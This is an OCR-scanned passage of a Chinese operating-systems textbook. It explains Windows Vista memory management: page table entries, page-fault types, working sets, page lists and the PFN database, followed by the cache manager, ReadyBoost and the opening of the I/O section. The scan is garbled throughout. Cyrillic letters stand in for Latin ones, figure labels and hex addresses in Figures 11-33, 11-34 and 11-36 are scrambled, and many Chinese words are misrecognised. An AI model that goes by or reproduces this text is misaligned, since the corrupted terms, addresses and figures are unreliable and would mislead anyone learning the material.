内 容 。 这 确实 很 有 助 于 提高 系统 性 能 。 因 为 存储 管理 器 可 以 使 用 访问 位 来 实现 LRU (Least-Recently 
Used， 最 近 最 少 使 用 ) 类 型 的 页 面 替换 策略 。LRU 原 理 是， 那些 最 长 时 间 没 有 被 使 用 过 的 页 面 有 最 小 的 
可 能 性 在 不 久 的 将 来 被 再 次 使 用 。 访 问 位 使 存储 管理 器 知道 一 个 页 面 被 访问 过 了 ， 脏 位 使 存储 管理 器 知 
道 一 个 页 面 被 修改 了 ,或 者 更 重要 的 是 ， 一 个 页 面 没 有 被 修改 。 如 果 一 个 页 面 自从 从 磁盘 上 读 到 内 存 后 
没有 被 修改 过 ， 存 储 管理 器 就 没有 必要 在 将 该 页 面 用 到 其 他 地 方 之 前 将 页 面 内 容 写 回 磁盘 了 。 

正如 表 11-33 所 示 ，x86 体 系 结构 通常 使 用 32 位 大 小 的 页 表 项 ， 而 x64 体 系 结构 使 用 64 位 大 小 的 页 表 
项 。 在 域 上 面 的 唯一 区 别 是 x64 的 物理 页 号 域 是 30 位 ， 而 不 是 20 位 。 然 而 ， 现 今 存在 的 任何 x64 处 理 器 所 
支持 的 物理 页 面 的 数量 都 要 远 小 于 x64 体 系 结构 所 能 表示 的 数量 。x86 体 系 结构 也 支持 一 种 特殊 的 物理 地 
址 扩展 (Physical Address Extension，PAE) 。PAE 模 式 允 许 处 理 器 访问 超过 4GB 的 物理 内 存 ， 附 加 的 物 
理 页 框 位 要 求 PAE 模 式 下 的 页 表 项 也 是 64 位 。 
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31 12119876543210 
Р P[P[u[R 
物理 页 号 |AvL|G|A|DjAjcljwl /| Р (а) 
T plrlsjw 
6362__5251 12119876543210 
PT | TPTPTuTR 
N|- ave 物理 页 号 АМ. [СА ЈОЈАЈСМ/УР (Ы) 
т ojt|s|w 
NX ~ No eXecute PCD ~ Page Cache Disable 
AVL – AVaiLable to the OS PWT - Page Write-Through 
G- Global page U/S - User/Supervisor 
РАТ – Раде Attribute Table RAW ~ Read/Write access 
D ~ Dirty (modified) Р — Present (valid) 


А- Accessed (referenced) 
a) b) 


图 11-33 一 个 a) Intel x86 体 系 结构 和 b) AMD x64 体 系 结构 上 的 已 映射 页 面 的 页 表 项 (PTE) 


每 个 页 面 失效 都 可 以 归 入 以 下 五 类 中 的 一 类 : 

1) 所 引用 的 页 面 没 有 提交 。 

2) 尝试 违反 权限 的 页 面 访问 。 

3) 修改 一 个 共享 的 写 时 复制 页 面 。 

4) 需要 扩大 栈 。 

5) 所 引用 的 页 已 经 提交 但 是 当前 没有 映射 。 

第 一 种 和 第 二 种 情况 是 由 于 编程 错误 引起 。 如 果 一 个 程序 试图 使 用 一 个 没有 一 个 有 效 映 射 的 地 址 或 
试图 进行 一 个 称 为 访问 违例 (access violation) 的 无 效 操作 (例如 试图 写 一 个 只 读 的 页 面 ) ， 通 常 的 结果 
是 ， 这 个 进程 会 被 终止 。 访 问 破坏 的 原因 通常 是 坏 指针 ， 包 括 访问 从 进程 释放 的 和 被 解除 映射 的 内 存 。 

第 三 与 第 二 种 情况 有 相同 的 症状 〈 试 图 写 一 个 只 读 的 页 面 ) ， 但 是 处 理 方式 是 不 一 样 的 。 因 
为 写 时 复制 ， 存 储 管理 器 不 会 报告 访问 违例 ， 相 反 它 会 为 当前 进程 产生 一 个 该 页 面 的 私 
有 副本 ， 然 后 返回 到 试图 写 该 页 面 的 线程 。 该 线程 将 重 试 写 操作 ， 而 这 次 的 写 操作 将 会 成 功 完成 而 不 会 
引发 页 面 失 效 。 

第 四 种 情况 在 线程 向 栈 中 压 人 一 个 值 ， 而 这 个 值 会 被 写 到 一 个 还 没有 被 分 配 的 页 面 的 情况 下 发 生 。 
存储 管理 器 程序 能 够 识别 这 种 特殊 情况 。 只 要 为 栈 保留 的 虚拟 页 面 还 有 空间 ， 存 储 管理 器 就 会 提供 一 个 
新 的 物理 页 面 ， 将 该 页 面 清 零 ， 最 后 把 该 页 面 映射 到 进程 地 址 空间 。 线 程 在 恢复 执行 的 时 候 会 重 试 上 次 
引发 页 面 失效 的 内 存 访问 ， 而 这 次 该 访问 会 成 功 。 

最 后 ， 第 五 种 情况 就 是 常见 的 页 面 失效 。 这 种 异常 包含 下 述 几 种 情况 。 如 果 该 页 是 由 文件 映射 的 ， 
内 存 管理 器 必须 查找 该 页 与 内 存 区 对 象 结合 在 一 起 的 原型 页 表 等 类 似 的 数据 结构 ， 从 而 保证 在 内 存 中 不 
存在 该 页 的 副本 。 如 果 该 页 的 副本 已 经 在 内 存 中 ， 即 在 另 一 个 进程 的 页 面 链 表 已 经 存在 该 页 面 的 副本 ， 
或 者 在 后 备 、 已 修改 页 链表 中 ， 则 只 需要 共享 该 页 即 可 。 否 则 ， 内 存 管理 器 分 配 一 个 空间 的 物理 页 面 ， 
并 安排 从 磁盘 复制 文件 页 。 

如 果 内 存 管理 器 能 够 从 内 存 中 找到 需要 的 页 而 不 是 去 磁盘 查找 从 而 响应 页 面 失效 ， 则 称 为 软 异 党 
(soft fault) 。 如 果 需 要 从 磁盘 进行 复制 ， 则 称 为 硬 异 常 (hard fault) 。 软 异常 同 硬 异 常 相 比 开销 更 小 ， 对 
于 应 用 程序 性 能 的 影响 很 小 。 软 异常 出 现在 下 面 场景 中 : 一 个 共享 的 页 已 经 映射 到 另 一 个 进程 ， 请 求 一 
个 新 的 全 零 页 ， 或 所 需 页 面 已 经 从 进程 的 工作 集 移 除 ， 但 是 还 没有 重用 。 

当 一 个 物理 页 面 不 再 映射 到 任何 进程 的 页 表 ， 将 进入 以 下 三 种 状态 之 一 ， 空间、 修改 或 后 备 。 内 存 
管理 器 会 立刻 释放 类 似 那 些 已 结束 进程 的 栈 页 面 这 样 不 再 会 使 用 的 页 面 。 根据 判断 映射 页 面 的 页 表 项 中 
的 上 次 从 磁盘 读 出 后 的 脏 位 是 否 设置 ， 页 面 可 能 会 再 次 发 生 异 常 ， 从 而 进入 已 修改 链表 或 者 后 备 链表 
(standby list)。 已 修改 链表 中 的 页 面 最 终 会 写 回 磁盘 ， 然 后 移 到 后 备 链表 中 。 

内 存 管理 器 可 以 根据 需要 从 空闲 链表 或 者 后 备 链表 中 分 配 页 面 。 它 在 分 配 页 面 并 从 磁盘 复制 之 前 ， 
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总 是 在 已 修改 链表 和 后 备 链表 中 检查 该 页 面 是 否 已 经 在 内 存 中 。Windows Vista 中 的 预约 式 调 页 机 制 通过 
读 和 人 那些 未 来 可 能 会 用 到 的 页 面 并 把 它们 插入 后 备 链表 的 方式 将 硬 异 常 转化 为 软 异 常 。 内 存 管理 器 通过 
读 入 成 组 的 连续 页 面 而 不 是 仅仅 一 个 页 面 来 进行 一 定数 量 的 普通 预约 式 调 页 。 多 余 调 入 的 页 面 立刻 插入 
后 备 链表 。 而 由 于 内 存 管 理 器 的 开销 主要 是 进行 WO 操作 引起 的 ， 因 而 预约 式 调 页 并 不 会 带 来 很 大 的 浪 
费 。 与 读 人 一 灸 页 面相 比 ， 仅 读 人 一 个 页 面 的 额外 开销 是 可 以 忽略 的 。 

图 11-33 中 的 页 表 项 指 的 是 物理 页 号 ， 而 不 是 虚拟 页 号 。 为 了 更 新 页 表 (以 及 页 目录 ) 项 ， 内 核 需 
要 使 用 虚拟 地 址 。Windows 使 用 如 图 11-34 所 示 的 页 目录 表 项 中 的 自 映射 (self-map) 表 项 将 当前 进程 的 
页 表 和 页 目录 映射 到 内 核 虚拟 地 址 空间 。 通 过 映射 页 目录 项 到 页 目录 ( 自 映射 )， 就 具有 了 能 用 来 指向 
页 目录 项 (图 11-34a) 和 页 表 项 (图 11-34b) 的 虚拟 地 址 。 每 个 进程 的 自 映射 占用 4MB 内 核 地 址 空间 
(x86 上 )。 幸 运 的 是 ， 该 4MB 地 址 空间 是 同样 一 块 地址 空间 。 


Свз 
0x300. 
0x390 
虚拟 虚拟 
地 址 1100 0000 00 11 0000 0000 1100 0000 00 00| 地 址 1100 0000 00 11 1001 0000 1100 1000 01 00| 
0300c00 c0390c84 
а) b) 


Ѕей-тар: PDIOxc0300000>>22] is РО (page-directory) 
Virtual address (а): (PTE ")(Oxc0300c00) points to РО[0х300] which is the ѕей-тар раде directory entry 
Virtual address (b): (PTE ")(Oxc0390c84) points to PTE for virtual address 0хө4321000 


图 11-34 x86 上 ，Windows 用 来 映射 页 表 和 页 目录 的 物理 页 面 到 内 核 虚 拟 地 址 的 自 映射 表 项 


2. 页 面 置换 算法 

当空 闲 物理 页 面 数量 降 得 较 低 时 ， 内 存 管理 器 开始 从 内 核 态 的 系统 进程 以 及 用 户 态 进程 移 走 页 面 。 
目标 就 是 使 得 最 重要 的 虚拟 页 面 在 内 存 中 ， 而 其 他 的 在 磁盘 上 。 决 定 什么 是 重要 的 需要 技巧 。Windows 
通过 大 量 使 用 工作 集 来 解决 这 一 问题 。 工 作 集 处 在 内 存 中， 不 需要 通过 页 面 失效 即 可 使 用 的 映射 人 内 存 
的 页 面 。 当 然 ， 工 作 集 的 大 小 和 构成 随 着 从 属于 进程 的 线程 运行 来 回 变动 。 

每 个 进程 的 工作 集 由 两 个 参数 描述 : 最 小 值 和 最 大 值 。 这 两 个 参数 并 不 是 硬性 边界 ， 因 而 一 个 进程 
在 内 存 中 可 能 具有 比 它 的 工作 集 最 小 值 还 小 的 页 面 数量 (在 特定 的 环境 下 )， 或 者 比 它 的 工作 集 最 大 值 
还 大 得 多 的 页 面 数量 。 每 个 进程 初始 具有 同样 的 最 大 值 和 最 小 值 的 工作 集 ， 但 这 些 边界 随 着 时 间 的 推移 
是 可 以 改变 的 ， 或 是 由 包含 在 作业 中 的 进程 的 作业 对 象 决定 。 根 据 系统 中 的 全 部 物理 内 存 大 小 ， 这 个 默 
认 的 初始 最 小 值 的 范围 是 20 ~ 50 个 页 面 ， 而 最 大 值 的 范围 是 45 ~ 345 个 页 面 。 系 统管 理 员 可 以 改变 这 些 
默认 值 。 尽 管 一 般 的 家 庭 用 户 很 少 去 设置 ， 但 是 服务 器 端 程序 可 能 需要 设置 。 

只 有 当 系统 中 的 可 用 物理 内 存 降 得 很 低 的 时 候 工 作 集 才 会 起 作用 。 其 他 情况 下 允许 进程 任意 使 用 它 
们 选择 的 通常 远 远 超出 工作 集 最 大 值 的 内 存 。 但 是 当 系统 面临 内 存 压力 的 时 候 ， 内 存 管理 器 开始 将 超出 
工作 集 上 限 最 大 的 进程 使 用 的 内 存 压 回 到 它们 的 工作 集 范围 内 。 工 作 集 管理 器 具有 三 级 基于 定时 器 的 周 
期 活动 。 新 的 活动 会 加 入 到 相应 的 级 别 。 

1) 大 量 的 可 用 内 存 : 扫描 页 面 , 复位 页 面 的 访问 位 ,并 使 用 访问 位 的 值 来 表示 每 个 页 面 的 新 旧 程度 。 
在 每 个 工作 集 内 保留 使 用 一 个 估算 数量 的 未 使 用 页 面 。 

2) 内 存 开始 紧缺 : 对 每 个 具有 一 定 比例 未 用 页 面 的 进程 ， 停 止 为 工作 集 增加 页 面 ， 同 时 在 需要 增加 
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一 个 新 的 页 面 的 时 候 换 出 最 旧 的 页 面 。 换 出 的 页 面 进入 后 备 或 者 已 修改 链表 。 

З) 内 存 紧缺 ， 消减 〈 也 即 减 小 ) 工作 集 ， 通 过 移 除 最 旧 的 页 面 从 而 降低 工作 集 的 最 大 值 。 

平衡 集 管理 器 (balance set manager) 线程 调用 工作 集 管理 器 ， 使 得 其 每 秒 都 在 。 工 作 集 管理 
器 抑制 一 定数 量 的 工作 从 而 不 会 使 得 系统 过 载 。 它 同时 也 监控 要 写 回 磁盘 的 已 修改 链表 上 的 页 面 ， 通 过 
唤醒 ModifiedPageWriter 线 程 使 得 页 面 数 量 不 会 增长 得 过 快 。 

3. 物理 内 存 管理 

上 面 提 到 了 物理 页 面 的 三 种 不 同 链表 ， 空 闪 链 表 、 后 备 链表 和 已 修改 链表 。 除 此 以 外 还 有 第 四 种 链 
表 ， 即 全 部 被 填 零 的 空闲 页 面 。 系 统 会 频繁 地 请 求全 零 的 页 面 。 当 为 进程 提供 新 的 页 面 ， 或 者 读 取 一 个 
文件 的 最 后 部 分 不 足 一 个 页 面 时 ， 需 要 全 零 页 面 。 将 一 个 页 面 写 为 全 零 是 需要 时 间 的 ， 因 此 在 后 台 使 用 
低 优先 级 的 线程 创建 全 零 页 是 一 个 较 好 的 方式 。 另 外 还 有 第 五 种 链表 存放 有 硬件 错误 的 页 面 ( 即 通过 硬 
件 错误 检测 ) 。 

系统 中 的 所 有 页 面 要 么 由 一 个 有 效 的 页 表 项 索引 ， 要 么 属于 以 上 五 种 链表 中 的 一 种 ， 它 们 的 全 体 称 
为 页 框 号 数据 库 PFN 数据库) 。 图 11-35 表 明 PFN 数 据 库 的 结构 。 该 表格 由 物理 页 框 号 索引 。 表 项 都 是 
固定 长 度 的， 但 是 不 同类 型 的 表 项 使 用 不 同 的 格式 (例如 共享 页 面相 对 于 私有 页 面 )。 有 效 的 表 项 维护 
页 面 的 状态 以 及 指向 该 页 面 数 量 的 计数 。 工 作 和 集 中 的 页 面 指出 哪个 表 项 索引 它们 。 还 有 一 个 指向 该 页 的 
进程 页 表 的 指针 ( 非 共享 页 )， 或 者 指向 原型 页 表 的 指针 (共享 页 )。 

此 外 还 有 一 个 指向 链表 中 下 一 个 页 面 的 指针 (如果 有 的 话 )， 以 及 其 他 的 若干 诸如 正在 进行 读 和 写 
的 域 以 及 标志 位 等 。 这 些 链表 链接 在 一 起 ， 并 且 通 过 下 标 指向 下 一 个 单元 ， 不 使 用 指针 ， 从 而 达到 节省 
存储 空间 的 目的 。 另 外 用 物理 页 面 的 表 项 汇总 在 若干 指向 物理 页 面 的 页 表 项 中 找到 的 脏 位 ( 即 由 于 共享 
页 面 )。 表 项 还 有 一 些 别 的 信息 用 来 表示 内 存 页 面 的 不 同 ， 以 使 访问 那些 内 存 速度 更 快 的 大 型 服务 器 系 
ЖЕ ( 即 NUMA- 非 均衡 存储 器 访问 的 机 器 ) 。 


页 帧 数据 库 
State Ст WS Other РТ Next 页 表 


图 11-35 一 个 有 效 的 页 面 在 页 框 数据 库 上 的 一 些 主要 域 


工作 集 管理 器 和 其 他 的 系统 线程 控制 页 面 在 工作 集 和 不 同 的 链表 间 移 动 。 下 面 对 这 些 转变 进行 研究 。 
当 工 作 集 管理 器 将 一 个 页 面 从 某 个 工作 集中 去 掉 ， 则 该 页 面 按照 自身 是 否 修改 的 状态 进入 后 备 或 已 修改 
链表 的 底部 。 这 一 转变 在 图 11-36 的 (1) 中 进行 了 说 明 。 

这 两 个 链表 中 的 页 面 仍然 是 有 效 的 页 面 ， 当 页 面 失效 发 生 的 时 候 需要 它们 中 的 一 个 页 ， 则 将 该 页 移 
回 工作 集 而 不 需要 进行 磁盘 UO 操作 (2) 。 当 一 个 进程 退出 ， 该 进程 的 非 共享 页 面 不 能 通过 异常 机 制 回 
到 以 前 的 工作 集 ， 因 此 该 进程 页 表 中 的 有 效 页 面 以 及 挂 起 和 已 修改 链表 中 的 页 面 都 移入 空闲 链表 (3)。 
任何 该 进程 的 页 面 文件 也 得 到 释放 。 

其 他 的 系统 调用 会 引起 别 的 转变 。 平 衡 集 管理 器 线程 每 4 秒 运行 - -次 来 查找 那些 所 有 的 线程 都 进入 
空间 状态 超过 一 定 秒 数 的 进程 。 如 果 发 现 这 样 的 进程 ， 就 从 物理 内 存 去 掉 它们 的 内 核 栈 ， 这 样 的 进程 的 
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页 面 也 如 (1) 一 样 移动 到 后 备 链表 或 已 修改 链表 。 
需要 全 零 页 面 (8) 


(6) 被 索引 的 页 面 | 


(2) 软 页 面 失效 


чың Jaan Jenn) __ зел 
表 | (4) 已 修 | 面 链表 |(5) 回收 | 面 链表 | (7) 全 零 | 面 链表 
改 页 面 写 页 面 线程 
БЕ J 
? 页 (3) 进程 退出 坏 的 内 存 页 
(1) 从 所 有 的 工作 集 收回 的 页 面 јаја 


图 11-36 不 同 的 页 面 链表 以 及 它们 之 间 的 转变 


两 个 系统 线程 一 一 映射 页 面 写 入 器 (mapped page writer) 和 已 修改 页 面 写 入 器 (modified page 
writer) ， 周 期 性 地 被 唤醒 来 检查 是 否 系统 中 有 足够 的 干净 页 面 。 如 果 没 有 ， 这 两 个 线程 从 已 修改 链表 的 
顶部 取出 页 面 ， 写 回 到 磁盘 ， 然 后 将 这 些 页 面 插入 后 备 链表 (4) 。 前 者 处 理 对 于 映射 文件 的 写 ， 而 后 者 
处 理 页 面 文件 的 写 。 这 些 写 的 结果 就 是 将 已 修改 (Ж) 页 面 移 到 后 备 (干净 ) 链表 中 。 

之 所 以 使 用 两 个 线程 是 因为 映射 文件 可 能 会 因为 写 的 结果 增长 ， 而 增长 的 结果 就 需要 对 磁盘 上 的 数 
据 结构 具有 相应 的 权限 来 分 配 空闲 磁盘 块 。 当 一 个 页 面 被 写 人 时 如 果 没 有 足够 的 内 存 ， 就 会 导致 死 锁 。 
另 一 个 线程 则 是 解决 向 页 面 文件 写 入 页 时 的 问题 。 

下 面 说 明 图 11-36 中 另 一 个 转换 。 如 果 进 程 解除 页 映射 ， 该 页 不 再 和 进程 相关 从 而 进入 空闲 链表 (5), 
当 该 页 是 共享 的 时 候 例外 。 当 页 面 失效 会 请 求 一 个 页 框 给 将 要 读 入 的 页 ， 此 时 该 页 框 会 尽 可 能 从 空闲 链 
表 中 取 下 (6)。 由 于 该 页 会 被 全 部 重 写 ， 因 此 即使 有 机 密 的 信息 也 没有 系 。 

栈 的 增长 则 是 另 一 种 情况 。 这 种 情况 下 ， 需 要 一 个 空 的 页 框 ， 同 时 安全 规则 要 求 该 页 全 零 。 由 于 这 
个 原因 ， 另 一 个 称 为 零 页 面 线程 (ZeroPage thread) 的 低 优先 级 内 核 线程 (参见 图 11-28) 将 空闲 链表 中 
的 页 面 写 全 零 并 将 页 面 放 入 全 零 页 链表 (7). 全 零 页 面 很 可 能 比 空闲 页 面 更 加 有 用 ， 因 此 只 要 当 CPU 空 
闲 且 有 空闲 页 面 ， 零 页 面 线程 就 会 将 这 些 页 面 全 部 写 零 ， 而 在 CPU 空闲 的 时 候 进 行 这 一 操作 也 是 不 增加 
开销 的 。 

所 有 这 些 链表 的 存在 导致 了 一 些微 妙 的 策略 抉择 。 例 如 ， 假设 要 从 磁盘 载 入 一 个 页 面 ,但 是 空闲 链 
表 是 空 的 ， 那 么 ， 要 么 从 后 备 链表 中 取出 一 个 干净 页 (虽然 这 样 做 稍 后 有 可 能 导致 缺 页 )， 要 么 从 全 零 
页 面 链表 中 取出 一 个 空 页 (忽略 把 该 页 清 零 的 代价 ) , 系统 必须 在 上 述 两 种 策略 之 间 做 出 选择 。 哪 一 个 
更 好 呢 ? 

内 存 管理 器 必须 决定 系统 线程 把 页 面 从 已 修改 链表 移动 到 后 备 链表 的 积极 程度 。 有 干净 的 页 面 后 备 
总 比 有 胜 页 后 备 好 得 多 (因为 如 有 需要 ,干净 的 页 可 以 立即 重用 )， 但 是 一 个 积极 的 净化 策略 意味 着 更 
多 的 磁盘 1/O， 同时 一 个 刚刚 净化 的 页 面 可 能 由 于 缺 页 中 断 重新 回 到 工作 集中 ， 然后 又 成 为 脏 页 。 通 常 
来 讲 ，Windows 通 过 算法 、 启 发 、 猜 测 、 历 史 、 经 验 以 及 管理 员 可 控 参数 的 配置 来 做 权衡 。 

总 而 言 之 ， 内 存 管理 需要 一 个 拥有 多 种 数据 结构 、 算 法 和 启发 性 的 十 分 复杂 、 重要 的 构件 。 它 尽 可 
能 地 自我 调整 ， 但 是 仍然 留 有 很 多 选项 使 系统 管理 员 可 以 通过 配置 这 些 选项 来 影响 系统 性 能 。 大 部 分 的 
选项 和 计数 器 可 以 通过 工具 浏览 ， 相 关 的 各 种 工具 包 在 前 面 都 有 提 到 。 也 许 在 这 里 最 值得 记 住 的 就 是 ， 
在 真实 的 系统 里 ， 内 存 管理 不 仅仅 是 一 个 简单 的 时 钟 或 老化 的 页 面 算法 。 


11.6 Windows Vista 的 高 速 缓存 
Windows 高 速 缓存 (cache) 通过 把 最 近 和 经 常 使 用 的 文件 片段 保存 在 内 存 中 的 方式 来 提升 文件 系统 的 


性 能 。 高 速 缓存 管理 器 管理 的 是 虚拟 寻 址 的 数据 块 ， 也 就 是 文件 片段 ， 而 不 是 物理 寻 址 的 磁盘 块 。 这 种 方 
法 非常 适合 NTFS 文 件 系统 ， 如 11.8 节 所 示 。NTFS 把 所 有 的 数据 作为 文件 来 存储 ， 包括 文件 系统 的 元 数据 。 
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高 速 缓存 的 文件 片段 称 为 视图 (view) ， 这 是 因为 它们 代表 了 被 映射 到 文件 系统 的 文件 上 的 内 核 虚拟 地 
址 片段 。 所 以 ， 在 高 速 缓存 中 ， 对 物理 内 存 的 管理 实际 上 是 由 内 存 管理 器 提供 的 。 高 速 缓存 管理 器 的 作用 
是 为 视图 管理 内 核 虚 拟 地 址 的 使 用 ， 命 令 内 存 管理 器 在 物理 内 存 中 钉 住 页 面 ， 以 及 为 文件 系统 提供 接口 。 

Windows 高 速 缓存 管理 器 工具 在 文件 系统 中 被 广泛 地 共享 。 这 是 因为 高 速 缓存 是 根据 独立 的 文件 来 虚 
拟 寻 址 的 ， 高 速 缓存 管理 器 可 以 在 文件 的 基础 上 很 轻易 地 实现 预 读 取 。 访 问 高 速 缓存 数据 的 请 求 来 自 于 每 
个 文件 系统 。 由 于 文件 系统 不 需要 先 把 文件 的 偏 移 转换 成 物理 磁盘 号 然后 再 请 求 读 取 高 速 缓存 的 文件 页 ， 
所 以 虚拟 缓存 非常 方便 。 类 似 的 转换 发 生 在 内 存 管理 器 调用 文件 系统 访问 存储 在 磁盘 上 的 页 面 的 时 候 。 

除了 对 内 核 虚拟 地 址 和 用 来 缓存 的 物理 内 存 资源 的 管理 外 ， 考 虑 到 视图 的 一 致 性 ， 大 批量 磁盘 回 写 ， 
以 及 文件 结束 标志 的 正确 维护 特别 是 当 文件 扩展 的 时 候 ) ， 高 速 缓存 管理 器 还 必须 与 文件 系统 协作 。 在 
文件 系统 、 高 速 缓存 管理 器 和 内 存 管理 器 之 间 管 理 文件 最 困难 的 方面 在 于 文件 中 最 后 一 个 字 节 的 偏 移 ， 即 
有 效 数据 长 度 。 如 果 一 个 程序 写 出 了 文件 末尾 ， 则 越过 的 磁盘 块 都 需要 清 零 ， 同 时 为 了 安全 的 原因 ， 在 文 
件 的 元 数据 中 记录 的 有 效 数据 长 度 不 应 该 允许 访问 未 经 初始 化 的 磁盘 块 ， 所 以 全 零 磁盘 块 在 文件 元 数据 更 
新 为 新 的 长 度 之 前 必须 写 回 到 磁盘 上 。 然 而 ， 可 以 预见 的 是 ， 如 果 系 统 崩溃 ， 一 些 文件 的 数据 块 可 能 还 没 
有 按照 内 存 中 的 数据 进行 更 新 ， 还 有 一 些 数据 块 可 能 含有 属于 其 他 文件 的 数据 ， 这 都 是 不 能 接受 的 。 

现在 让 我 们 来 看 看 高 速 缓存 管理 器 是 如 何 工 作 的 。 当 一 个 文件 被 引用 时 ， 高 速 缓存 管理 器 映射 一 块 
大 小 为 256KB 的 内 核 虚拟 地 址 空间 给 文件 。 如 果 文件 大 于 256KB， 那 么 每 次 只 有 一 部 分 文件 被 映射 进来 。 
如 果 高 速 缓存 管理 器 耗 尽 了 虚拟 地 址 空间 中 大 小 为 256KB 的 块 ， 那 么 ， 它 在 映射 一 个 新 文件 之 前 必须 释 
放 一 个 旧 的 文件 。 文 件 一 旦 被 映射 ， 高 速 缓存 管理 器 通过 把 内 核 虚拟 地 址 空间 复制 到 用 户 缓冲 区 的 方式 
来 满足 对 该 数据 块 的 请 求 。 如 果 要 复制 的 数据 块 不 在 物理 内 存 当中 ， 会 发 生 缺 页 中 断 ， 内 存 管理 器 会 按 
昭通 常 的 方式 处 理 该 中 断 。 高 速 缓存 管理 器 甚至 不 知道 一 个 数据 块 是 不 是 在 内 存 当中 。 复 制 总 是 成 功 的 。 

除了 在 内 核 和 用 户 缓冲 区 之 间 复 制 的 页 面 ， 高 速 缓存 管理 器 也 为 映射 到 虚拟 内 存 的 页 面 和 依靠 指针 
访问 的 页 面 服务 。 当 一 个 线程 访问 某 一 映射 到 文件 中 的 虚拟 地 址 但 发 生 缺 页 的 时 候 ， 内 存 管理 器 在 大 多 
数 情况 下 能 够 使 用 软 中 断 处 理 这 种 访问 。 如 果 该 页 面 已 经 被 高 速 缓存 管理 器 映射 到 内 存 当中 ， 即 该 页 面 
已 经 在 物理 内 存 当 中 ， 那 么 就 不 需要 去 访问 磁盘 了 。 

高 速 缓存 不 一 定 适合 所 有 的 应 用 程序 。 大 型 企业 应 用 程序 ， 如 SQL， 和 希望 自己 来 管理 高 速 缓存 和 
1O。Windows 允 许 文 件 绕 开 高 速 缓存 管理 器 ， 以 未 缓冲 1/0 的 方式 打开 。 从 历史 上 看 ， 这 类 应 用 程序 使 
用 一 个 可 增长 的 用 户 态 虚拟 地 址 空间 来 替代 操作 系统 提供 的 高 速 缓存 ， 因 此 ， 系 统 应 支持 一 种 配置 ， 使 
得 重新 启动 后 能 给 应 用 程序 提供 其 所 需 的 3GB 的 用 户 态 地 址 空间 ， 而 只 使 用 1GB 的 地 址 空间 用 于 内 核 态 
来 代替 2-GB/2-GB 的 传统 分 割 。 这 种 运行 模式 (启动 选项 启用 后 ， 称 为 3GB 模 式 ) 在 一 些 允许 以 多 种 粒 
度 来 调整 用 户 /内 核 地 址 空间 分 割 的 操作 系统 上 不 太 灵活 。 当 Windows 运 行 在 3GB 模 式 下 时 ， 只 有 一 半数 
量 的 内 核 虚 拟 地 址 可 用 。 高 速 缓存 管理 器 通过 映射 更 少 的 文件 来 进行 调整 ， 这 正 是 SQL 所 喜欢 的 。 

Windows Vista 在 系统 中 引入 了 一 种 全 新 的 、 有 别 于 高 速 缓存 管理 器 的 缓存 技术 ， 称 为 ReadyBoost。 
用 户 可 以 在 USB 接 口 或 其 他 端口 插入 闪存 ， 并 命令 操作 系统 使 用 闪存 作为 一 个 通 写 缓 在。 闪存 引入 了 一 
种 新 的 存储 层次 ， 这 对 于 增加 磁盘 读 缓存 的 数量 特别 有 用 。 虽 然 比 不 上 作为 普通 内 存 的 动态 RAM 
(DRAM)， 但 是 从 闪存 读 取 数 据 还 是 相当 快 的 。 结 合 高 速 的 DRAM 和 相对 廉价 的 闪存 ，Vista 系 统 以 少量 
的 DRAM， 使 得 不 必 开 启 机 箱 就 可 以 获得 更 高 的 性 能 。 

ReadyBoost 压 缩 数据 (通常 为 2 倍 ) ， 并 加 密 。ReadyBoost 使 用 一 个 过 滤 驱 动 程序 来 处 理 文件 系统 发 
送 到 卷 管理 器 的 IO 请 求 。 名 为 ReadyBoot 的 类 似 技术 ， 通 过 使 用 闪存 缓存 数据 来 加 速 Windows Vista 系 统 
的 启动 时 间 。 但 是 这 些 技术 对 拥有 1GB 或 更 多 内 存 的 系统 影响 较 小 。 在 只 有 512MB 内 存 的 系统 上 尝试 运 
行 Windows Vista 才 是 它们 真正 有 帮助 的 地 方 。 内 存 容量 将 近 1GB 的 系统 拥有 足够 的 内 存 ， 页 面 请 求 非常 
罕见 ,使 得 磁盘 IO 能 够 满足 大 多 数 使 用 场景 。 

通 写 方式 对 闪存 被 拔除 时 减少 数据 丢失 很 重要 ， 但 未 来 的 PC 硬件 可 能 在 主板 上 直接 集成 闪存 。 这 
样 ， 闪 存 不 用 通 写 方式 也 可 以 使 用 ， 从 而 缓存 系统 故障 时 也 需要 继续 存在 的 关键 数据 ， 而 无 需 旋转 磁盘 。 
这 不 仅 带 来 了 性 能 的 提升 ， 而 且 还 可 以 降低 能 耗 (从 而 提高 笔记 本 电脑 的 电池 洗 命 ) ， 
了 。 现 在 一 些 笔记 本 电脑 一 直 在 致力 于 使 用 大 量 的 闪存 来 代替 机 电磁 盘 。 
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11.7 Windows Vista 的 输入 /输出 

Windows LO 管理 器 提供 了 灵活 的 、 可 扩展 的 基础 框架 ， 以 便 有 效 地 管理 非常 广泛 的 UO 设 备 和 服务 ， 
支持 自动 的 设备 识别 和 驱动 程序 安装 ( 即 插 即 用 ) 及 用 于 设备 和 CPU 的 电源 管理 一 -以 上 均 基 于 异步 结 
构 使 得 计 : 以 与 1O 传 输 重要 。 大 约 有 数 以 十 万 计 的 设备 在 Windows Vista 上 工作 。 一 大 批 常用 设备 甚至 
不 需要 安装 驱动 程序 ， 因 为 Windows 操 作 系统 已 附带 其 驱动 程序 。 但 即使 如 此 ， 考 虑 到 所 有 的 版 本 ， 也 
有 将 近 100 万 种 不 同 的 驱动 程序 在 Windows Vista 上 运行 。 以 下 各 节 中 ， 我 们 将 探讨 一 些 VO 相 关 的 问题 。 


11.7.1 基本 概念 

JO 管 理 器 与 即 插 即 用 管理 器 紧密 联系 。 即 插 即 用 背后 的 基本 思想 是 一 条 可 枚 举 总 线 。 许 多 总 线 的 
设计 ， 包 括 PC 卡 、PCI、PCI-x、AGP、USB、IEEE 1394、EIDE 和 SATA， 都 支持 即 插 即 用 管理 器 向 每 
个 插 档 发送 请 求 ， 并 要 求 每 个 插 槽 上 的 设备 表明 身份 。 即 插 即 用 管理 器 发 现 设备 的 存在 以 后 ， 就 为 其 分 
配 硬件 资源 ， 如 中 断 等 级 ， 找 到 适当 的 驱动 程序 ， 并 加 载 到 内 存 中 。 每 个 驱动 程序 加 载 时 ， 就 为 其 创建 
一 个 驱动 程序 对 象 driver object) 。 每 个 设备 至 少 分 配 一 个 设备 对 象 。 对 于 一 些 总 线 ， 如 SCSI， 枚 举 只 
发 生 在 启动 时 间 ， 但 对 于 其 他 总 线 ， 如 USB， 枚 举 可 以 在 任何 时 间 发 生 ， 这 就 需要 即 插 即 用 管理 器 ， 总 
线 驱 动 程序 (确实 在 枚 举 的 总 线 )， 和 IO 管理 器 之 间 的 密切 协作 。 

